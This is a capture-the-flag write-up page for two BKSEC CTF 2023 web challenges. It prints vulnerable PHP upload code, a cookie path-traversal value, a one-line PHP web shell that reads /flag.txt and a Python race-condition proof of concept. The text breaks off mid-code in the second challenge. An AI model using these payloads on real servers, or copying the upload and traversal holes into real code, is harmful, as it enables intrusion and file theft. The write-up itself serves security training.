

<!DOCTYPE html>
<html lang="en" itemscope itemtype="http://schema.org/WebPage">
  <head>
    

  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">

  <title>BKSEC-CTF-2023 - WEB &#39;s challenges - &gt; root@l3mnt2010:~# ./exploit.py</title>
  <meta name="description" content="WEB challs  Metadata checker  Flow: Handle: Deployment:   Image Copy resample      .toc-container {position: fixed;left: 0;top: 100px; width: 350px; max-height: 80vh;overflow-y: auto;overflow-x: auto;padding: 20px;border-right: 1px solid #eee;background-color: black; z-index: 100;text-align: left; }.toc {font-size: 2.6rem; color: #fff; text-align: left; }.toc h4 {margin-top: 0;margin-bottom: 1rem;font-size: 1.">
  <meta name="author" content="l3mnt2010"/><script type="application/ld+json">
{
    "@context": "http://schema.org",
    "@type": "WebSite",
    "name": "\u003e root@l3mnt2010:~# .\/exploit.py",
    
    "url": "https:\/\/l3mnt2010.github.io\/"
}
</script><script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Organization",
  "name": "",
  "url": "https:\/\/l3mnt2010.github.io\/"
  
  
  
  
}
</script>
<script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [{
        "@type": "ListItem",
        "position": 1,
        "item": {
          "@id": "https:\/\/l3mnt2010.github.io\/",
          "name": "home"
        }
    },{
        "@type": "ListItem",
        "position": 3,
        "item": {
          "@id": "https:\/\/l3mnt2010.github.io\/write-up\/2023-08-19-bksecctf2023\/",
          "name": "Bksec ctf 2023 web \u0027s challenges"
        }
    }]
}
</script><script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Article",
  "author": {
    "name" : ""
  },
  "headline": "BKSEC-CTF-2023 - WEB \u0027s challenges",
  "description" : "WEB challs  Metadata checker  Flow: Handle: Deployment:   Image Copy resample      \r\r\r\r\r.toc-container {\rposition: fixed;\rleft: 0;\rtop: 100px; width: 350px; max-height: 80vh;\roverflow-y: auto;\roverflow-x: auto;\rpadding: 20px;\rborder-right: 1px solid #eee;\rbackground-color: black; z-index: 100;\rtext-align: left; }\r.toc {\rfont-size: 2.6rem; color: #fff; text-align: left; }\r.toc h4 {\rmargin-top: 0;\rmargin-bottom: 1rem;\rfont-size: 1.",
  "inLanguage" : "en",
  "wordCount":  1331 ,
  "datePublished" : "0001-01-01T00:00:00\u002b00:00",
  "dateModified" : "0001-01-01T00:00:00\u002b00:00",
  "image" : "https:\/\/l3mnt2010.github.io\/avatar.png",
  "keywords" : [ "CTF, English" ],
  "mainEntityOfPage" : "https:\/\/l3mnt2010.github.io\/write-up\/2023-08-19-bksecctf2023\/",
  "publisher" : {
    "@type": "Organization",
    "name" : "https:\/\/l3mnt2010.github.io\/",
    "logo" : {
        "@type" : "ImageObject",
        "url" : "https:\/\/l3mnt2010.github.io\/avatar.png",
        "height" :  60 ,
        "width" :  60
    }
  }
}
</script>


<meta property="og:title" content="BKSEC-CTF-2023 - WEB &#39;s challenges" />
<meta property="og:description" content="WEB challs  Metadata checker  Flow: Handle: Deployment:   Image Copy resample      .toc-container {position: fixed;left: 0;top: 100px; width: 350px; max-height: 80vh;overflow-y: auto;overflow-x: auto;padding: 20px;border-right: 1px solid #eee;background-color: black; z-index: 100;text-align: left; }.toc {font-size: 2.6rem; color: #fff; text-align: left; }.toc h4 {margin-top: 0;margin-bottom: 1rem;font-size: 1.">
<meta property="og:image" content="https://l3mnt2010.github.io/avatar.png" />
<meta property="og:url" content="https://l3mnt2010.github.io/write-up/2023-08-19-bksecctf2023/" />
<meta property="og:type" content="website" />
<meta property="og:site_name" content="&gt; root@l3mnt2010:~# ./exploit.py" />

  <meta name="twitter:title" content="BKSEC-CTF-2023 - WEB &#39;s challenges" />
  <meta name="twitter:description" content="WEB challs  Metadata checker  Flow: Handle: Deployment:   Image Copy resample      .toc-container {position: fixed;left: 0;top: 100px; width: 350px; max-height: 80vh;overflow-y: auto; …">
  <meta name="twitter:image" content="https://l3mnt2010.github.io/avatar.png" />
  <meta name="twitter:card" content="summary_large_image" />
  <link href='https://l3mnt2010.github.io/avatar.png' rel='icon' type='image/x-icon'/>
  <meta name="generator" content="Hugo 0.83.1" />
  <link rel="alternate" href="https://l3mnt2010.github.io/index.xml" type="application/rss+xml" title="&gt; root@l3mnt2010:~# ./exploit.py"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.10.0/katex.min.css" integrity="sha384-9eLZqc9ds8eNjO3TmqPeYcDj8n+Qfa4nuSiGYa6DjLNcv9BtN69ZIulL9+8CqC9Y" crossorigin="anonymous">
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.5.0/css/all.css" integrity="sha384-B4dIYHKNBt8Bc12p+WXckhzcICo0wtJAoU8YZTY5qE0Id1GSseTk6S+L3BlXeVIU" crossorigin="anonymous">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"><link rel="stylesheet" href="https://l3mnt2010.github.io/css/main.css" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" /><link rel="stylesheet" href="https://l3mnt2010.github.io/css/syntax.css" /><link rel="stylesheet" href="https://l3mnt2010.github.io/css/codeblock.css" /><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe.min.css" integrity="sha384-h/L2W9KefUClHWaty3SLE5F/qvc4djlyR4qY3NUV5HGQBBW7stbcfff1+I/vmsHh" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/default-skin/default-skin.min.css" integrity="sha384-iD0dNku6PYSIQLyfTOpB06F2KCZJAKLOThS5HRe8b3ibhdEQ6eKsFf/EeFxdOt5R" crossorigin="anonymous">



  </head>
  <body>
    <nav class="navbar navbar-default navbar-fixed-top navbar-custom">
  <div class="container-fluid">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#main-navbar">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="https://l3mnt2010.github.io/">&gt; root@l3mnt2010:~# ./exploit.py</a>
    </div>

    <div class="collapse navbar-collapse" id="main-navbar">
      <ul class="nav navbar-nav navbar-right">
        
          
            <li>
              <a title="Home" href="https://l3mnt2010.github.io/">Home</a>
            </li>
          
        
          
            <li>
              <a title="Posts" href="https://l3mnt2010.github.io/posts">Posts</a>
            </li>
          
        
          
            <li>
              <a title="Write-up" href="https://l3mnt2010.github.io/write-up">Write-up</a>
            </li>
          
        
          
            <li>
              <a title="About" href="https://l3mnt2010.github.io/about">About</a>
            </li>
          
        

        

        
      </ul>
    </div>

    
      <div class="avatar-container">
        <div class="avatar-img-border">
          <a title="&gt; root@l3mnt2010:~# ./exploit.py" href="https://l3mnt2010.github.io/">
            <img class="avatar-img" src="https://l3mnt2010.github.io/avatar.png" alt="&gt; root@l3mnt2010:~# ./exploit.py" />
           
          </a>
        </div>
      </div>
    

  </div>
</nav>




    


<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

<div class="pswp__bg"></div>

<div class="pswp__scroll-wrap">
    
    <div class="pswp__container">
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
    </div>
    
    <div class="pswp__ui pswp__ui--hidden">
    <div class="pswp__top-bar">
      
      <div class="pswp__counter"></div>
      <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
      <button class="pswp__button pswp__button--share" title="Share"></button>
      <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
      <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
      
      
      <div class="pswp__preloader">
        <div class="pswp__preloader__icn">
          <div class="pswp__preloader__cut">
            <div class="pswp__preloader__donut"></div>
          </div>
        </div>
      </div>
    </div>
    <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
      <div class="pswp__share-tooltip"></div>
    </div>
    <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
    </button>
    <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
    </button>
    <div class="pswp__caption">
      <div class="pswp__caption__center"></div>
    </div>
    </div>
    </div>
</div>


  
  
  






  

  <header class="header-section ">
    
    
    <div class="intro-header no-img">
      <div class="container">
        <div class="row">
          <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
            <div class="write-up-heading">
              
                <h1>BKSEC-CTF-2023 - WEB &#39;s challenges</h1>
              
              
                <hr class="small">
              
              
              
            </div>
          </div>
        </div>
      </div>
    </div>
  
  </header>


    
<div class="container" role="main">
  <div class="row">
    <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
      <article role="main" class="blog-post">
        
  <div class="toc-container">
    <div class="toc">
      <nav id="TableOfContents">
        
        <nav id="TableOfContents">
  <ol>
    <li>
      <ol>
        <li><a href="#web-challs">WEB challs</a>
          <ol>
            <li><a href="#metadata-checker">Metadata checker</a>
              <ol>
                <li><a href="#flow">Flow:</a></li>
                <li><a href="#handle">Handle:</a></li>
                <li><a href="#deployment">Deployment:</a></li>
              </ol>
            </li>
            <li><a href="#image-copy-resample">Image Copy resample</a></li>
          </ol>
        </li>
      </ol>
    </li>
  </ol>
</nav>
      </nav>
    </div>
  </div>

  <style>
     
    .toc-container {
      position: fixed;
      left: 0;
      top: 100px;  
      width: 350px;  
      max-height: 80vh;
      overflow-y: auto;
      overflow-x: auto;
      padding: 20px;
      border-right: 1px solid #eee;
      background-color: black;  
      z-index: 100;
      text-align: left;  
    }

    .toc {
      font-size: 2.6rem;  
      color: #fff;  
      text-align: left;  
    }

    .toc h4 {
      margin-top: 0;
      margin-bottom: 1rem;
      font-size: 1.6rem;  
      text-align: left;  
    }

     
    .toc ul, .toc ol {
      padding-left: 0;  
      margin: 0;
      list-style-type: none;
      text-align: left;  
    }

     
    .toc ul ul, .toc ul ol, .toc ol ul, .toc ol ol {
      padding-left: 10px;
    }

    .toc li {
      padding: 10px 0;
      line-height: 1.6;
      text-align: left;  
    }

    .toc a {
      text-decoration: none;
      color: #fff;  
      display: block;
      text-align: left;  
      padding-left: 3px;  
      font-size: 1.5rem;  
      transition: color 0.2s;
    }

    .toc a:hover {
      color: #ffcc00;  
    }

     
    .toc a.active {
      color: #ffcc00;  
      font-weight: bold;
      border-left: 4px solid #ffcc00;  
      padding-left: 3px;  
      margin-left: -5px;
    }

     
    .main-content {
      margin-left: 380px;  
    }

     
    @media (max-width: 1200px) {
      .toc-container {
        width: 280px;  
      }
      .main-content {
        margin-left: 320px;
      }
    }

    @media (max-width: 900px) {
      .toc-container {
        position: static;
        width: 100%;
        max-height: none;
        border-right: none;
        border-bottom: 1px solid #eee;
        margin-bottom: 20px;
      }
      .main-content {
        margin-left: 0;
      }
    }
  </style>

  <script>
    document.addEventListener('DOMContentLoaded', function() {
      
      function highlightTOC() {
        const headings = document.querySelectorAll('.main-content h1, .main-content h2, .main-content h3, .main-content h4, .main-content h5, .main-content h6');
        const tocLinks = document.querySelectorAll('.toc a');

        if (headings.length === 0 || tocLinks.length === 0) return;

        let currentActiveIndex = -1;
        const scrollPosition = window.scrollY;

        for (let i = 0; i < headings.length; i++) {
          const heading = headings[i];
          const headingTop = heading.offsetTop - 100;
          const headingBottom = headingTop + heading.offsetHeight;

          if (scrollPosition >= headingTop && scrollPosition <= headingBottom) {
            currentActiveIndex = i;
            break;
          }
        }

        tocLinks.forEach(link => link.classList.remove('active'));

        if (currentActiveIndex >= 0) {
          const currentHeading = headings[currentActiveIndex];
          const headingId = currentHeading.id;

          const correspondingLink = document.querySelector(`.toc a[href="#${headingId}"]`);
          if (correspondingLink) {
            correspondingLink.classList.add('active');

            const tocContainer = document.querySelector('.toc-container');
            const linkTop = correspondingLink.offsetTop;
            const containerScrollTop = tocContainer.scrollTop;
            const containerHeight = tocContainer.clientHeight;

            if (linkTop < containerScrollTop || linkTop > containerScrollTop + containerHeight) {
              tocContainer.scrollTop = linkTop - containerHeight / 2;
            }
          }
        }
      }

      highlightTOC();
      window.addEventListener('scroll', highlightTOC);
      window.addEventListener('resize', highlightTOC);

      const fragment = window.location.hash;
      if (fragment) {
        const element = document.querySelector(fragment);
        if (element) {
          element.scrollIntoView({ behavior: 'smooth' });

          const tocLinks = document.querySelectorAll('.toc a');
          tocLinks.forEach(link => {
            link.classList.remove('active');
            if (link.getAttribute('href') === fragment) {
              link.classList.add('active');
            }
          });

          highlightTOC();
        }
      }

      const tocLinks = document.querySelectorAll('.toc a');
      tocLinks.forEach(link => {
        link.addEventListener('click', function(event) {
          const targetId = link.getAttribute('href').substring(1);
          const targetElement = document.getElementById(targetId);

          if (targetElement) {
            targetElement.scrollIntoView({ behavior: 'smooth' });

            tocLinks.forEach(l => l.classList.remove('active'));
            link.classList.add('active');

            history.pushState(null, null, `#${targetId}`);

            event.preventDefault();
          }
        });
      });
    });
  </script>  


<!-- raw HTML omitted -->
<h2 id="web-challs">WEB challs</h2>
<h3 id="metadata-checker">Metadata checker</h3>
<ul>
<li>This is whitebox challenge, you can view source below:</li>
</ul>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="k">if</span> <span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">))</span> <span class="p">{</span>
    <span class="nv">$uploadpath</span> <span class="o">=</span> <span class="s2">&#34;/var/tmp/&#34;</span><span class="p">;</span>
    <span class="nv">$error</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span><span class="p">;</span>
    
    <span class="nv">$timestamp</span> <span class="o">=</span> <span class="nx">time</span><span class="p">();</span>

    <span class="nv">$userValue</span> <span class="o">=</span> <span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;user&#39;</span><span class="p">];</span>
    <span class="nv">$target_file</span> <span class="o">=</span> <span class="nv">$uploadpath</span> <span class="o">.</span> <span class="nv">$userValue</span> <span class="o">.</span> <span class="s2">&#34;_&#34;</span> <span class="o">.</span> <span class="nv">$timestamp</span> <span class="o">.</span> <span class="s2">&#34;_&#34;</span> <span class="o">.</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;image&#34;</span><span class="p">][</span><span class="s2">&#34;name&#34;</span><span class="p">];</span>

    <span class="nx">move_uploaded_file</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;image&#34;</span><span class="p">][</span><span class="s2">&#34;tmp_name&#34;</span><span class="p">],</span> <span class="nv">$target_file</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;image&#34;</span><span class="p">][</span><span class="s2">&#34;size&#34;</span><span class="p">]</span> <span class="o">&gt;</span> <span class="mi">1048576</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$error</span> <span class="o">.=</span> <span class="s1">&#39;&lt;p class=&#34;h5 text-danger&#34;&gt;Maximum file size is 1MB.&lt;/p&gt;&#39;</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">elseif</span> <span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;image&#34;</span><span class="p">][</span><span class="s2">&#34;type&#34;</span><span class="p">]</span> <span class="o">!==</span> <span class="s2">&#34;image/jpeg&#34;</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$error</span> <span class="o">.=</span> <span class="s1">&#39;&lt;p class=&#34;h5 text-danger&#34;&gt;Only JPG files are allowed.&lt;/p&gt;&#39;</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
      <span class="nv">$exif</span> <span class="o">=</span> <span class="nx">exif_read_data</span><span class="p">(</span><span class="nv">$target_file</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">true</span><span class="p">);</span>

      <span class="k">if</span> <span class="p">(</span><span class="nv">$exif</span> <span class="o">===</span> <span class="k">false</span><span class="p">)</span> <span class="p">{</span>
          <span class="nv">$error</span> <span class="o">.=</span> <span class="s1">&#39;&lt;p class=&#34;h5 text-danger&#34;&gt;No metadata found.&lt;/p&gt;&#39;</span><span class="p">;</span>
      <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
          <span class="nv">$metadata</span> <span class="o">=</span> <span class="s1">&#39;&lt;table class=&#34;table table-striped&#34;&gt;&#39;</span><span class="p">;</span>
          <span class="k">foreach</span> <span class="p">(</span><span class="nv">$exif</span> <span class="k">as</span> <span class="nv">$key</span> <span class="o">=&gt;</span> <span class="nv">$section</span><span class="p">)</span> <span class="p">{</span>
              <span class="nv">$metadata</span> <span class="o">.=</span>
                  <span class="s1">&#39;&lt;thead&gt;&lt;tr&gt;&lt;th colspan=&#34;2&#34; class=&#34;text-center&#34;&gt;&#39;</span> <span class="o">.</span>
                  <span class="nv">$key</span> <span class="o">.</span>
                  <span class="s2">&#34;&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&#34;</span><span class="p">;</span>
              <span class="k">foreach</span> <span class="p">(</span><span class="nv">$section</span> <span class="k">as</span> <span class="nv">$name</span> <span class="o">=&gt;</span> <span class="nv">$value</span><span class="p">)</span> <span class="p">{</span>
                  <span class="nv">$metadata</span> <span class="o">.=</span>
                      <span class="s2">&#34;&lt;tr&gt;&lt;td&gt;&#34;</span> <span class="o">.</span> <span class="nv">$name</span> <span class="o">.</span> <span class="s2">&#34;&lt;/td&gt;&lt;td&gt;&#34;</span> <span class="o">.</span> <span class="nv">$value</span> <span class="o">.</span> <span class="s2">&#34;&lt;/td&gt;&lt;/tr&gt;&#34;</span><span class="p">;</span>
              <span class="p">}</span>
              <span class="nv">$metadata</span> <span class="o">.=</span> <span class="s2">&#34;&lt;/tbody&gt;&#34;</span><span class="p">;</span>
          <span class="p">}</span>
          <span class="nv">$metadata</span> <span class="o">.=</span> <span class="s2">&#34;&lt;/table&gt;&#34;</span><span class="p">;</span>
      <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="cp">?&gt;</span><span class="err">
</span></code></pre></div><div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php">   <span class="o">&lt;?</span><span class="nx">php</span>
        <span class="c1">// I want to show a loading effect within 1.5s here but don&#39;t know how
</span><span class="c1"></span>        <span class="nx">sleep</span><span class="p">(</span><span class="mf">1.5</span><span class="p">);</span>
        <span class="c1">// This might be okay..... I think so
</span><span class="c1"></span>        <span class="c1">// My teammates will help me fix it later, I hope they don&#39;t forget that
</span><span class="c1"></span>        <span class="k">echo</span> <span class="nv">$error</span><span class="p">;</span>
        <span class="k">echo</span> <span class="nv">$metadata</span><span class="p">;</span>
        <span class="nx">unlink</span><span class="p">(</span><span class="nv">$target_file</span><span class="p">);</span>
        <span class="cp">?&gt;</span><span class="err">
</span></code></pre></div><ul>
<li>You can see this challenge about upload file</li>
</ul>
<h4 id="flow">Flow:</h4>
<ul>
<li>Check if exist $_FILE initialization $uploadpath = &ldquo;/var/tmp/&quot;;</li>
<li>Get cookie &ldquo;user&rdquo; to set name $target_file.</li>
<li>move_uploaded_file to $target_file</li>
<li>Maximum file size is 1MB and Only JPG files are allowed.</li>
<li>Read metadata this file to show information about it.</li>
<li>unlink($target_file); after 1.5s.</li>
</ul>
<h4 id="handle">Handle:</h4>
<ul>
<li>It seems like this is a challenge to pass the file type check so we will change the ContentType of the file to pass this filter and to upload a php file.</li>
<li>But one more problem here is that the php file will not be processed by the server because its location is in /var/tmp/ and observe here we can control the &ldquo;user&rdquo; cookie in $target_file, you can see:</li>
</ul>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="nv">$target_file</span> <span class="o">=</span> <span class="nv">$uploadpath</span> <span class="o">.</span> <span class="nv">$userValue</span> <span class="o">.</span> <span class="s2">&#34;_&#34;</span> <span class="o">.</span> <span class="nv">$timestamp</span> <span class="o">.</span> <span class="s2">&#34;_&#34;</span> <span class="o">.</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;image&#34;</span><span class="p">][</span><span class="s2">&#34;name&#34;</span><span class="p">];</span>
</code></pre></div><ul>
<li>So I will use pathtraversal technique to move my php file to /var/www/html/ so that my php file can be run.</li>
<li>Our final problem here is that this file will be deleted after 1.5 seconds of being sent to the server, so we need to race to get the data in that time.</li>
</ul>
<h4 id="deployment">Deployment:</h4>
<ul>
<li>Flag in question in /flag.txt</li>
<li>I touch a file php basic</li>
</ul>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="o">&lt;?</span><span class="nx">php</span> <span class="k">echo</span> <span class="nx">system</span><span class="p">(</span><span class="s1">&#39;cat /flag.txt&#39;</span><span class="p">);</span><span class="cp">?&gt;</span><span class="err">
</span></code></pre></div><ul>
<li>Control $target_file:</li>
</ul>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="nv">$target_file</span> <span class="o">=</span> <span class="nv">$uploadpath</span> <span class="o">.</span> <span class="nv">$userValue</span> <span class="o">.</span> <span class="s2">&#34;_&#34;</span> <span class="o">.</span> <span class="nv">$timestamp</span> <span class="o">.</span> <span class="s2">&#34;_&#34;</span> <span class="o">.</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;image&#34;</span><span class="p">][</span><span class="s2">&#34;name&#34;</span><span class="p">];</span>
</code></pre></div><ul>
<li>
<p>I change $_COOKIE[&lsquo;user&rsquo;] to &ldquo;../../../../../../var/html/&rdquo;</p>
</li>
<li>
<p>In example file name is l3m.php.</p>
</li>
<li>
<p>$target_file this will be worth it /var/tmp/../../../../../../var/html/_(current_time)_l3m.php.</p>
</li>
<li>
<p>I touch POC by python to Race with Burp Intruder to to continuously upload files to the server</p>
</li>
<li>
<p><strong>POC</strong>:</p>
</li>
</ul>
<div class="highlight"><pre class="chroma"><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">time</span>

<span class="n">url</span> <span class="o">=</span> <span class="s2">&#34;http://18.141.143.171:30149/&#34;</span>


<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
    <span class="n">file_name</span> <span class="o">=</span> <span class="s2">&#34;_&#34;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()))</span> <span class="o">+</span> <span class="s2">&#34;_l3m.php&#34;</span>
    <span class="n">res</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span> <span class="o">+</span> <span class="n">file_name</span><span class="p">)</span> 
    <span class="k">print</span><span class="p">(</span><span class="n">res</span><span class="o">.</span><span class="n">text</span><span class="p">)</span>
</code></pre></div><h3 id="image-copy-resample">Image Copy resample</h3>
<p>This is whitebox challenge, you can view source below:</p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="o">&lt;?</span><span class="nx">php</span>

<span class="k">if</span><span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;image&#39;</span><span class="p">])){</span>
    <span class="nv">$upload_dir</span> <span class="o">=</span> <span class="s2">&#34;./uploads/&#34;</span><span class="p">;</span>
    <span class="nv">$file_name</span> <span class="o">=</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;image&#39;</span><span class="p">][</span><span class="s1">&#39;name&#39;</span><span class="p">];</span>
    <span class="nv">$file_tmp</span> <span class="o">=</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;image&#39;</span><span class="p">][</span><span class="s1">&#39;tmp_name&#39;</span><span class="p">];</span>
    <span class="nv">$file_type</span> <span class="o">=</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;image&#39;</span><span class="p">][</span><span class="s1">&#39;type&#39;</span><span class="p">];</span>
    <span class="nv">$file_ext</span> <span class="o">=</span> <span class="nx">strtolower</span><span class="p">(</span><span class="nx">pathinfo</span><span class="p">(</span><span class="nv">$file_name</span><span class="p">,</span> <span class="nx">PATHINFO_EXTENSION</span><span class="p">));</span>
    <span class="nv">$size_check</span> <span class="o">=</span> <span class="nx">getimagesize</span><span class="p">(</span><span class="nv">$file_tmp</span><span class="p">);</span>
    <span class="nv">$allowed_ext</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="s1">&#39;jpg&#39;</span><span class="p">,</span> <span class="s1">&#39;png&#39;</span><span class="p">,</span> <span class="s1">&#39;php&#39;</span><span class="p">);</span>
    <span class="k">if</span><span class="p">(</span><span class="nx">in_array</span><span class="p">(</span><span class="nv">$file_ext</span><span class="p">,</span> <span class="nv">$allowed_ext</span><span class="p">)){</span>
        <span class="nv">$image</span> <span class="o">=</span> <span class="nx">imagecreatefromstring</span><span class="p">(</span><span class="nx">file_get_contents</span><span class="p">(</span><span class="nv">$file_tmp</span><span class="p">));</span>
        <span class="nv">$cropped_image</span> <span class="o">=</span> <span class="nx">imagecreatetruecolor</span><span class="p">(</span><span class="mi">40</span><span class="p">,</span> <span class="mi">40</span><span class="p">);</span>
        <span class="nx">imagecopyresampled</span><span class="p">(</span><span class="nv">$cropped_image</span><span class="p">,</span> <span class="nv">$image</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="nx">imagesx</span><span class="p">(</span><span class="nv">$image</span><span class="p">),</span> <span class="nx">imagesy</span><span class="p">(</span><span class="nv">$image</span><span class="p">));</span>
        <span class="nv">$random_name</span> <span class="o">=</span> <span class="nx">md5</span><span class="p">(</span><span class="nx">uniqid</span><span class="p">(</span><span class="nx">rand</span><span class="p">(),</span> <span class="k">true</span><span class="p">));</span>
        <span class="nv">$new_file_name</span> <span class="o">=</span> <span class="nv">$random_name</span> <span class="o">.</span> <span class="s1">&#39;.&#39;</span> <span class="o">.</span> <span class="nv">$file_ext</span><span class="p">;</span>   
        <span class="k">if</span> <span class="p">(</span><span class="nv">$file_ext</span> <span class="o">===</span> <span class="s1">&#39;jpg&#39;</span> <span class="o">||</span> <span class="nv">$file_ext</span> <span class="o">===</span> <span class="s1">&#39;png&#39;</span>  <span class="p">)</span> <span class="p">{</span>
            <span class="c1">//check size
</span><span class="c1"></span>            <span class="k">if</span> <span class="p">(</span><span class="nv">$size_check</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">&lt;</span> <span class="mi">40</span> <span class="o">||</span> <span class="nv">$size_check</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">&lt;</span> <span class="mi">40</span><span class="p">)</span> <span class="p">{</span> 
                <span class="k">echo</span> <span class="s2">&#34;Ảnh của bạn hơi nhỏ. Chúng tôi cần ảnh lớn hơn 40x40 pixels</span><span class="se">\n</span><span class="s2">&lt;br&gt;&#34;</span><span class="p">;</span>
            <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                <span class="k">if</span><span class="p">(</span><span class="nv">$file_ext</span> <span class="o">===</span> <span class="s1">&#39;jpg&#39;</span><span class="p">){</span>
                    <span class="nx">imagejpeg</span><span class="p">(</span><span class="nv">$cropped_image</span><span class="p">,</span> <span class="nv">$upload_dir</span> <span class="o">.</span> <span class="nv">$new_file_name</span><span class="p">);</span>
                <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                    <span class="nx">imagepng</span><span class="p">(</span><span class="nv">$cropped_image</span><span class="p">,</span> <span class="nv">$upload_dir</span> <span class="o">.</span> <span class="nv">$new_file_name</span><span class="p">);</span>
                <span class="p">}</span>
                <span class="k">echo</span> <span class="s2">&#34;ảnh đã được lưu tại đây</span><span class="se">\n</span><span class="s2">&lt;br&gt;&#34;</span><span class="p">;</span>
                <span class="k">echo</span> <span class="nv">$upload_dir</span><span class="p">;</span>
                <span class="k">echo</span> <span class="nv">$new_file_name</span><span class="p">;</span>  

                <span class="nx">imagedestroy</span><span class="p">(</span><span class="nv">$image</span><span class="p">);</span>
                <span class="nx">imagedestroy</span><span class="p">(</span><span class="nv">$cropped_image</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="nx">imagepng</span><span class="p">(</span><span class="nv">$cropped_image</span><span class="p">,</span> <span class="nv">$upload_dir</span> <span class="o">.</span> <span class="nv">$new_file_name</span><span class="p">);</span>
            <span class="k">echo</span> <span class="s2">&#34;ảnh đã được lưu tại đây</span><span class="se">\n</span><span class="s2">&lt;br&gt;&#34;</span><span class="p">;</span>
            <span class="k">echo</span> <span class="nv">$upload_dir</span><span class="p">;</span>
            <span class="k">echo</span> <span class="nv">$new_file_name</span><span class="p">;</span>  

            <span class="nx">imagedestroy</span><span class="p">(</span><span class="nv">$image</span><span class="p">);</span>
            <span class="nx">imagedestroy</span><span class="p">(</span><span class="nv">$cropped_image</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>        
